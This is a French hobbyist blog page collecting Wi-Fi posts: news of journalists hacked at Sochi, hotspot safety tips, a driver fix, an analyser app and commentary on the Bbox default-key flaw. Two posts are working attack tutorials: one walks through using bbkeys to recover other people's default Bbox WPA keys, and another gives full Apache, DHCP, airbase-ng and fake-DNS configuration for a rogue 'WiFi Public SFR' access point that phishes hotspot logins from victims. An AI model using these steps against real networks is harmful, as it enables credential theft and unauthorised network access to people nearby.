Post Populaire

Affichage des articles dont le libellé est Wifi. Afficher tous les articles

JO de Sotchi : Piraté en une minute via le Wi-Fi de l’hôtel !



JO de Sotchi : Piraté en une minute via le Wi-Fi de l’hôtel !

Un journaliste de la NBC envoyé à Sotchi pour couvrir les Jeux olympiques a fait la désagréable expérience de voir son ordinateur portable instantanément piraté après s’être connecté dans sa chambre d’hôtel. Une simple malchance ou une attaque parfaitement organisée ?

« Il ne faut pas longtemps, ici, pour que quelqu’un vienne fouiller dans votre ordinateur portable, votre téléphone ou votre tablette » explique le journaliste Richard Engel dans une vidéo publiée mardi soir sur le site de NBC. Le journaliste a testé la sécurité d’une connexion Internet Wi-Fi au sein d’un hôtel dans lequel sont notamment logés des représentants de la presse internationale. 
A l’aide d’un expert en sécurité américain, il s’est ainsi créé une identité numérique dans laquelle seul son nom était vrai, et l’a enregistrée sur deux ordinateurs portables neufs qu’il a ensuite connecté à Internet.

Quelques instants plus tard, il a reçu un email lui souhaitant la bienvenue, avec un lien le menant vers des informations pratiques : il s’agissait, en réalisé d’un courriel d’hameçonnage, destiné à piéger le journaliste en installant un logiciel malveillant sur sa machine. « En une minute, les pirates se sont mis à fouiner dans mes données » explique Engel.

Le journaliste ajoute que la situation s’est reproduite un peu plus tard sur son téléphone portable, alors qu’il n’était non plus à l’hôtel, mais au restaurant, connecté à un réseau public. « Presque immédiatement, nous avons été piratés » explique-t-il, par un malware capable d’enregistrer les communications téléphoniques.

Si les menaces sont bien une réalité à partir du moment où un périphérique est connecté sur un réseau public – notamment par une attaque de type « man in the middle » où le pirate récupère les informations qui transitent entre le terminal et le réseau – se faire pirater systématiquement en un temps record est un constat des plus inquiétants à Sotchi, où sont attendu des milliers de touristes, de sportifs et de journalistes étrangers. « Il ne faut pas s’attendre à avoir une vie privée, y compris dans les chambres d’hôtels » déclare Richard Nigel. Son conseil : éviter de se connecter en Wi-Fi dans le pays, et ne laisser aucune donnée sensible sur son ordinateur, sa tablette ou son téléphone.

Source : Clubic
Tag : , , ,

Protéger votre wifi



Protéger votre wifi 

WiFi Protector est un logiciel libre, capable de rendre les réseaux sans fil plus sécurisé grâce à un système efficace et complet d'identification.

Il utilise un système de cryptage VPN avec clé de 256 Bits afin de cacher votre IP réel.
Pour utiliser WiFi Protector, outre le fait de devoir installer le programme, vous devez installer, si ce n'est pas déjà le cas, Silverlight. Sans ce complément, WiFi Protector ne pourra pas fonctionner. Une fois WiFi Protector installé, il vous suffit de cliquer sur le bouton vert "Get Protected" pour activer le service VPN et protéger votre appareil.

Télécharger ici

Sécurisé sa connexion au Free Wi-fi ou Hotspot


Sécurisé sa connexion au Free Wi-fi ou Hotspot 

Aujourd’hui, on trouve des Wi-Fi public presque partout, dans les aéroports, les cafés, les bibliothèques, etc… Mais malheureusement la plus part d’entre nous n’hésites pas à y accéder directement sans se rendre compte des risques qui peuvent nuire à leurs ordinateur ainsi que leurs vie privé.
Sur un réseau Wi-fi public, vos données, vos mots de passe, e-mails et autres informations ne sont pas crypter et peuvent facilement être visible pour les hackers. Cependant, il existe des moyens pour surfer en toute  sécurité sur un réseau Wi-fi public.
Voici les 6 principaux conseils pour vous connectez à un réseau Wi-fi public en toute sécurité:
1. Désactiver la connexion automatique: Lorsque vous êtes à proximité d’un Wi-fi public et votre connexion automatique est activée, vous pouvez êtres connecter automatiquement à se réseau sans être prévenu.
2. Évitez les transactions en ligne : Le shopping, services bancaires, paiement des factures rend la vie plus facile, mais assurez-vous que vous faites toutes vos opérations sensibles dans le confort de votre propre maison, sur une connexion VPN ou sur un réseau Wi-Fi qui est sécurisé par un WPA2.
3. Utiliser une connexion sécurisée (HTTPS) : Lorsque vous naviguez sur le Web sur un Wi-Fi non sécurisé, utilisez le protocole HTTPS chaque fois que possible. Contrairement à « http », le protocole « https » crée un canal sécurisé entre votre ordinateur et un serveur Web qui permet de crypter les données transmises. La plupart des sites, en particulier les sites bancaires se basculent automatiquement vers le protocole https. La majorité des sites utilisent le protocole « http » par défaut, mais peuvent aussi soutenir le «https» si vous le saisissez manuellement.
Par exemple, si vous souhaitez vous connectez à votre compte Gmail, utiliser le protocole « https » en tapant https://www.gmail au lieu de http://www.gmail.com .
Sécuriser connexion wifiGardez un oeil sur la barre d’adresse et si «https» revient en «http», cela indique que le site Web ne supporte pas le «https». Par mesure de sécurité, déconnectez-vous de tels sites Web immédiatement.
4. Désactiver le partage de fichiers et d’imprimante : Si sur votre ordinateur vous partagez les partitions de  vos disques durs, dossiers ou fichiers, assurez-vous de les départager temporairement lors d’une connexion à un réseau Wi-Fi public.
5. Activer le pare-feu : Avant de vous connectez à tout Wi-Fi publique, assurez-vous que votre pare-feu réseau est activé. Un pare-feu constitue votre première ligne de protection contre les intrusions extérieures. Il vous permet de contrôler les transmissions réseau et vous avertit lorsqu’un processus approuvé tente d’envoyer des données ou accéder à votre ordinateur. Vous pouvez simplement vous limiter à utiliser le pare-feu pré-installé qui vient avec Windows et Mac ou d’opter à une sécurité pare-feu supérieure avec des logiciels payants comme Symantec ou ZoneAlarm.
Sécuriser connexion wifi6. Ne jamais se connecter à un réseau ad-hoc: Savez-vous que tous les signaux sans fil que vous voyez sous la rubrique « réseau sans fil disponible » ne sont pas vraiment un signal sans fil à partir d’un routeur Wi-fi? Les réseaux ad-hoc permettent à un ordinateur de se connecter à Internet via un deuxième ordinateur sans avoir recours à un routeur ou points d’accès supplémentaires. Si vous vous connectez à un réseau ad-hoc, un autre utilisateur de se réseau pourrait facilement  accéder aux données sensibles de votre ordinateur.


Tag : , ,

Problème wifi Mac dual boot Windows

Problème wifi Mac dual boot Windows 

J’aime bien l’OS de Mac mais pour bosser j’ai besoin d’un bon vieux Windows. J’ai donc décidé d’installer en dual boot, Windows 8! Mac propose un super outil : Bootcamp (installé d’origine). Cet outil vous permet en quelques clics, de faire tourner un système d’exploitation Windows en dual boot.

Jusque là tout allait bien, clavier rétro-éclairé, touche fonctions, etc… sauf une chose : le WiFi!
Connexion WiFi impossible

La solution pour résoudre ce problème de connexion WiFi, downgrader le pilote de la carte réseau.


Téléchargez le bon pilote Broadcom ICI

N’installez pas les pilotes avec le Setup.exe qui se trouve dans le dossier compressé que vous venez de télécharger
Ouvrez le « Gestionnaire de périphériques«


Clic droit sur: Carte réseau Broadcom 802.11n
Puis: Propriétés
Sélectionnez l’onglet: Pilote


Clic sur: Mettre à jour le pilote
Clic sur: Rechercher un pilote sur mon ordinateur
Sélectionnez le nouveau pilote et laissez Windows l’installer.

Votre problème WiFi sera résolu !

Cracker une clé Bbox sous Windows

Cracker une clé Bbox sous Windows 

Je vais vous montrez une technique utiliser par les hacker's, pour casser une clé WPA de Bbox de chez Bouygues sous Windows ou Backtrack, a condition que la clé soit toujours celle d'origine.

Dans le cas de notre exemple, on souhaite connaitre la clé WPA de la Bbox avec le SSID (Bbox_380fc4).

(L’identifiant BBox correspond à la suite de lettres et de chiffres du SSID, soit ici dans mon cas 380fc4).

1)Première étape télécharger le pack bbkeys pour Windows et Backtrack + sources ici

2)Sous Windows ouvrez une commande CMD et glissez (bbkeyswin.exe) dedans, et sous Backtrack glissez (bbkeys) dans un terminal. (pour y afficher son chemin)

3)Il ne vous reste plus qu'à y rajouter la ligne de commande suivante:

-i 380fc4 -o cle.txt -v

en remplaçant l’identifiant 380fc4 par le votre bien sur

(ex sous Windows)



(ex sous Backtrak)


4) cliquez sur entrer et voila la clé.
(ex sous Windows)


(ex sous Backtrack)



Il est possible de récupérer la clé dans un fichier texte grâce au paramètre -o (output, fichier de sortie).

Attention cela ne marche pas avec toutes les Bbox, testez en plusieurs.
Je vous est montrer cette technique dans le but de vous faire comprendre comment agissent les pirates informatique, en aucun cas pour que vous deveniez vous même un de ces pirates... sachez que vous encourez de lourdes amendes en cas d'intrusion d'un réseau, ne vous appartenant pas !!!

Sebdelkil ne peut, et ne seras, en aucun cas responsable de vos agissement, rapport a cette démonstration de piratage!
Tag : ,

Création Rogue AP Hotspot SFR Backtrack 5

Faire un rogue hotspot SFR

Casser le réseau WiFi en WEP (et dont la clé est 123456, vérifique :p) c'est facile
Mais ça devient plus ardu quand on a affaire à du WPA. Chopper le handshake n'est pas un problème, quitte à se placer avec son laptop devant la porte d'entrée d'inconnus :D, mais trouver la bonne clé ça devient hard vu que la plupart du temps c'est une clé par défaut impossible à casser :'(

Il y a alors une solution : profiter des HotSpots qui eux se multiplient de plus en plus. Seul point noir : pour utiliser un hotspot de chez untel, il faut avoir les identifiants d'un compte enregistré chez untel.
Et c'est là qu'intervient notre rogue hotspot : Créer un réseau WiFi accessible à tous mais pour lequel toute tentative d'accès à Internet redirigera vers une page de connexion qui enregistrera les identifiants. Identifiants qui nous ouvrirons les portes des hotspots de chez untel à gogo :) Et puis question anonymat c'est le top. Il suffira de changer régulièrement son adresse MAC (pour les plus paranos) et de hotspot... vu que le seul vrai identifiant c'est les logins récupérés on est tranquille.
Par contre il faut que quelqu'un dans le coin ait déjà envie de se connecter via un hotspot et là il faut mieux être dans un endroit surpeuplé ou alors être très patient...

Tour d'horizon de la mise en place
Toutes les opérations sont destinées à un environnement BackTrack 5. Bien sûr ça peut être adapté pour votre distrib. Le script automatique final (install.bin) est lui uniquement dédié à BT5.
Les fichiers correspondant à cet article sont situés dans data/hotspot
Je n'entre pas dans les détails de la mise en place de la page web qui demandera les identifiants. Il suffit de pomper les pages et les images d'un vrai hotspot et de les re-servir. Pour le coup, Opera est le plus adapté avec son option d'enregistrement "Fichier HTML avec des images"
Pour le reste voici de quoi on a besoin :
  • Un serveur Apache qui renverra les pages. Il est intégré sur BT5
  • airbase-ng (de la suite airmon-ng) pour créer réseau WiFi. Il est sur BT5
  • Un serveur DHCP parce que les gens qui se connecteront au réseau doivent recevoir les paramêtres (routeur, DNS, IP...) N'est pas par défaut sur BT5
  • Un DNS menteur. Pas besoin d'un truc évolué, on veut juste un mini serveur DNS qui répondra à toutes les requêtes par l'adresse IP de notre serveur Apache
  • PHP pour pouvoir stocker les logins récupérés (c'est plus propre)
Vous devez déjà voir vers quoi on arrive. La personne se connecte au WiFi, se voit donner une adresse IP. Quand elle tente d'accèder à un site web, le DNS lui renvoit notre IP sur le réseau (mettons 192.168.1.1).
Mais c'est pas très propre car la page de login s'affichera dans le navigateur avec le nom DNS du site. On va donc configurer Apache pour qu'il redirige vers hotspot.neuf.fr qui sera pourtant le même serveur.
Idem pour la page demandée : la victime aura peut-être son navigateur qui ira vers www.truc.com/forum/. Dans ce cas là il faut aussi faire en sorte que une demande d'une page non existante sur notre serveur (ici /forum) renvoit vers notre page de login.

Configuration d'Apache
Apache gère les sites qu'il gère via le dossier /etc/apache2/sites-available/. On va d'abord créer un fichier default qui redirigera toutes les requêtes correspondant à un nom DNS autre que le hotspot. Voici son contenu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>
        ErrorLog /var/log/apache2/error.log
        Redirect permanent / "http://hotspot.neuf.fr/"
        LogLevel warn
        CustomLog /var/log/apache2/access.log combined
</VirtualHost>

On répète l'opération mais cette fois pour les requêtes HTTPS (fichier default-ssl). Par contre comme il n'y aura pas de relais Internet sur notre rogue hotspot, les CAs ne seront pas joignables et l'utilisateur aura un avertissement concernant le certifcat :( Voici les directives :








1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<IfModule mod_ssl.c>
<VirtualHost *:443>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>
        ErrorLog /var/log/apache2/error.log
        Redirect permanent / "http://hotspot.neuf.fr/"
        LogLevel warn
        CustomLog /var/log/apache2/ssl_access.log combined
        SSLEngine on
        SSLCertificateFile    /etc/ssl/certs/ssl-cert-snakeoil.pem
        SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key
        BrowserMatch "MSIE [2-6]" \
                nokeepalive ssl-unclean-shutdown \
                downgrade-1.0 force-response-1.0
        BrowserMatch "MSIE [17-9]" ssl-unclean-shutdown
</VirtualHost>
</IfModule>
Enfin il faut le fichier de conf de notre hotspot. On le nommera simplement hotspot

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName hotspot.neuf.fr
        DocumentRoot /var/www
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>
        ErrorDocument 404 "/404.php"
        ErrorLog /var/log/apache2/error.log
        LogLevel warn
        CustomLog /var/log/apache2/access.log combined
</VirtualHost>
Comme vous le voyez, les pages et scripts web sont à placer dans /var/www.

Mise en place de l'interface réseau
On va commencer par installer le serveur DHCP. Pour cela il faut avoir au préalable récupéré le .deb. On a pris dhcp3-server_3.1.3-2ubuntu3.2_i386.deb qui est accessible à cette adresse. L'install se fera classiquement en root avec dpkg -i dhcp3-server_3.1.3-2ubuntu3.2_i386.deb.
Ensuite on définit les régles de notre réseau via /etc/dhcp3/dhcpd.conf (pour plus d'infos voir la page de manuelle ou Google) :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option routers 192.168.1.1;
  range 192.168.1.10 192.168.1.20;
  option domain-name-servers 192.168.1.1;
  option broadcast-address 192.168.1.255;
}
L'install de DHCP toute à l'heure fait démarrer le serveur... On l'arrête comme on a changé le fichier de conf : /etc/init.d/dhcp3-server stop & killall dhclient3
Etape suivante : Mettre en place l'interface WiFI ! Car pour le moment on n'a fait que changer des fichiers de conf.

  1. echo "[!] Mise en place du hotspot..."
  2. airmon-ng start wlan0
  3. airbase-ng -e "WiFi Public SFR" -c 11 mon0&
  4. sleep 5
  5. ifconfig at0 up 
  6. ifconfig at0 192.168.1.1 netmask 255.255.25


Ici on passe l'interface wlan0 en mode monitor puis on associe un SSID à la nouvelle interface mon0. Il faudrait placer le SSID le plus crédible possible... Toutefois depuis une machine Windows si plusieurs réseaux accessibles ont le même SSID, seul celui qui a le plus fort signal est affiché. Conclusion : soit vous avez une carte wifi surpuissante, soit vous trichez en spécifiant un SSID proche mais différent ;-) Dans tous les cas le tri se fait toujours par force de signal.
On peut maintenant relancer notre serveur DHCP : dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /tmp/plop.pid at0

Mise en place d'Apache : finalisation et lancement
Il faut activer les sites dans le config globale d'Apache ainsi que les modules dont on a besoin :

echo "192.168.1.1 hotspot.neuf.fr" >> /etc/hosts
a2enmod ssl
a2ensite default-ssl
a2ensite hotspot
/etc/init.d/apache2 start

Mise en place du serveur DNS
Après quelques tests, notre préférence est allée au script fakedns.pl de 0x90.co.uk (blog sympa). Script à éditer selon nos attentes puis à exécuter : chmod +x fakedns.pl; ./fakedns.pl&
Maintenant tout est en place... plus qu'à attendre que la victime morde à l'hameçon :) Nous fournissons un script install.bin qui fait toutes les opérations sur BT5.

[Source]:---> Lotfree9

Sniffer Wifi



Sniffer Wifi
Il est maintenant possible pour les hackers de se balader dans la rue avec leur ordinateur, et de chopper plein d’informations transitant par les réseaux Wifi à portée d’antenne.
Si certains ont déjà eu l’idée d’utiliser des drones pour rester discrets, voici un bricolage d’un sniffeur de réseaux au sein d’un sac à dos Hello Kitty, pour que vous puissiez flâner dans la rue innocemment et au passage récupérer un paquet de données !
Pas moins de 14 antennes sont intégrées, pour permettre de suivre en simultané tous les canaux qu’utilise la technologie Wifi.
Sans compter sur la présence d’un Pineapple, un dispositif qui se fait passer pour un point d’accès Wifi, d’une clé USB 4G, d’une batterie pour un maximum d’autonomie, d’un refroidissement à eau, etc…
Le tout tourne sur un ordinateur, avec un système d’exploitation Backtrack 5, une distribution très utilisée dans le domaine de l’audit de sécurité informatique.
Impressionnant de geekitude non ? ;-)
Tag : ,

Wifi Analyser


wifi-analyser-android

Wifi Analyser


Le programme montre tous les réseaux Wifi environnants avec pour chacun d’entre eux des informations techniques détaillées.
Cela peut s’avérer utile lorsqu’on cherche à optimiser sa propre connexion pour par exemple avoir une occupation par canal pour en trouver un qui n’est pas saturé par le voisinage ou pour trouver des zones blanches où le signal est mal reçu.
L’outil est français, il est gratuit, on peut désactiver les publicités dans les options.
Les caractéristiques et les options de Wifi Analyser sont nombreuses :
  • Détection automatique des réseaux Wifi
  • Force du signal
  • Canal
  • Fréquence
  • Type d’encryptage
  • Graphiques de puissance
  • Occupation des canaux
  • Signal mètre pour tester un Wifi
  • Wifi Analyser s’adresse avant tout aux techniciens désireux d’évaluer la portée des réseaux sans fil avec pour objectif de mieux configurer son AP ou son routeur.
Tag : , ,

Crack Wifi


Crack Wifi


La clé WEP de la BBox des voisins abonnés chez Bougues Telecom est toujours écrite sur leur paillasson ...

Un an donc qu'un grand nombre de connexions internet via BBox sont utilisées à l'insu de leur propriétaires.

Ce fait n'a pas l'air de déranger l'opérateur, celui-ci ne mentionnant pas qu'il est impératif de modifier la clé WEP de connexion sous peine d'être presque certain de servir de hotspot gratuit.

La blague atteint son paroxysme lorsqu'on lit la FAQ de Bouygues Telecom se référant à la sécurité WiFi de la BBox.

Question : La Bbox est-elle sécurisée en Wifi ?
Réponse : Par défaut, la connexion Wifi de la Bbox est protégée par une clé de connexion (configuration en WPA) pour une sécurité optimale. Cette clé vous est fournie lors de l'installation.

Bing ... Nulle mention du fait que la clé WPA par défaut de l'équipement est aisément récupérable par un programme largement diffusé, on s'en doute !

Le programme BBkeys, compilé pour Windows et Linux, est l'adaptation par M1ck3y (d'une seule ligne de code) du script STkeys créé par Kevin Devine, qui avait le premier repéré cette faille sur les modems SpeedTouch et rendu publique sa découverte, gratuitement s'entend. Tous n'ont pas cette éthique et le BBkeys vendu via n° audiotel par M1ck3y est aussi simplement récupérable via les sites de partage de fichiers ou encore rendu librement accessible par Paul Da Silva via un script PHP.

Les plus courageux ont même directement modifié STkeys en changeant eux-mêmes les années de production au sein du script initial.

Un développeur offre même une application pour le système Android permettant de tester la sécurité de la clé WPA de sa BBox et vérifier qu'elle n'est pas trop facile à trouver par un pirate alléché par votre bande passante.

La BBox étant fournie avec un vice caché depuis maintenant plusieurs années, son distributeur ne devrait-il pas faire en sorte que ce défaut soit corrigé chez chacun de ses clients , voire au moins mentionner clairement sur le site qu'il est impératif de modifier la clé WEP de connexion ?

>> Correction :
Bouygues Telecom fournir sur ses pages d'assistance un lien nommé "Comment augmenter la sécurité de mon Wi-Fi ?" expliquant comment changer sa clé de cryptage WPA sous Windows XP, Windows Vista et Mac OS.

Vous savez ce qu'il vous reste à faire si vous avez une BBox et la clé WEP par défaut.
Tag : ,

- sebdelkil 2009-2015 - Aucun droit réservé -